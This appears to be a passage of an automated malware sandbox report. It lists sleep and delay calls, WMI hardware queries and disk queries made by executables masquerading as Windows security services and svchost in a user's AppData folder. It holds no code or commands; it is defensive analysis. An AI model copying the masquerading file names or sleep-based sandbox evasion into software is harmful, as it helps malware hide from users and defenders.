Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -599743s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -599625s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -599514s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -599394s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -599261s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -599156s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -598601s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -598475s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -598359s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -598236s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -598109s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -597983s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -597873s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -597761s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -597631s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -597500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -597371s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -597263s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -597137s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -597027s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -596922s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -596806s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -596687s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -596578s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -596468s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -596359s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -596231s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -596124s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -595768s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -595500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -595390s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -595281s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -595171s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -595062s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -594953s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -594843s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -594734s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -594625s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -594515s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -594406s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -594297s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -594182s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 2724 Thread sleep count: 214 > 30
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -594062s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -593953s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -593838s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -593719s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -593605s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -593472s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -593344s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -593234s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -593125s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -593016s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -592904s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -592793s >= -30000s
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe TID: 7276 Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe TID: 7224 Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe TID: 7224 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2000 Thread sleep count: 1576 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5668 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2616 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe TID: 8628 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 7192 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe TID: 7316 Thread sleep time: -495550s >= -30000s
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe TID: 8776 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7856 Thread sleep count: 1131 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8548 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8300 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8688 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8384 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8140 Thread sleep count: 1218 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8596 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8416 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7972 Thread sleep count: 1167 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8604 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8360 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5612 Thread sleep count: 1345 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8740 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8472 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7492 Thread sleep count: 1078 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8728 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8556 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8692 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8488 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7944 Thread sleep count: 1178 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8668 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8536 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7860 Thread sleep count: 1111 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8672 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8580 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8288 Thread sleep count: 1131 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8784 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8640 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8292 Thread sleep count: 1337 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8724 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8632 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8284 Thread sleep count: 1216 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8808 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8660 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8296 Thread sleep count: 753 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8788 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8612 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe TID: 8716 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe TID: 9156 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 7712 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe TID: 7244 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 7900 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
Source: C:\Users\user\AppData\Roaming\update.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\update.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\update.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\update.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\update.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\update.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Cracked.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\update.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe File Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\BTC.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\crack.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Cracked.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 600000
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 599881
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 599750
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 599594
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 599079
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 598922
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 598813
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 598688
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 598563
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 598450
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 598329
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 598204
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 598089
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 597969
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 597844
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 597730
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 597610
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 597485
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 597360
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 597235
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 597098
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 596969
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 596844
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 596734
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 596625
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 596516
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 596407
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 596282
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 596157
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 596032
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 595922
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 595808
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 595657
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 100000
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 99874
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 99764
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 99656
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 99546
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 99437
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 99324
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 99203
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 99093
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 98983
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 98875
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 98765
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 98656
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 98546
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 98437
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 98327
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 98218
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 98109
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 97999
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 600000
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 599869
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 599737
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 599578
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 599156
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 598922
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 598813
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 598682
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 598563
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 598453
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 598344
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 598219
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 598109
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 598000
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 597891
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 597775
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 597656
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 597547
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 597438
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 597313
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 597188
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 597052
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 596922
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 596812
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 596703
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 596594
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 596484
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 596375
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 596266
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 596154
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 596047
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 595937
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 595811
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 595687
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 595578
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 595468
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 595359
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 595250
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 595141
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 595016
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 594903
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 594797
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 594688
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 594569
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 594453
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 594343
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 594231
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 594125
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 594015
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 593906
                            Source: C:\Users\user\AppData\Roaming\update.exe | Thread delayed: delay time: 593797
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 600000
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 599868
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 599743
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 599625
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 599514
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 599394
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 599261
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 599156
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 598601
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 598475
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 598359
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 598236
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 598109
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 597983
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 597873
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 597761
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 597631
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 597500
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 597371
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 597263
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 597137
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 597027
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 596922
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 596806
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 596687
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 596578
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 596468
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 596359
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 596231
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 596124
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 595768
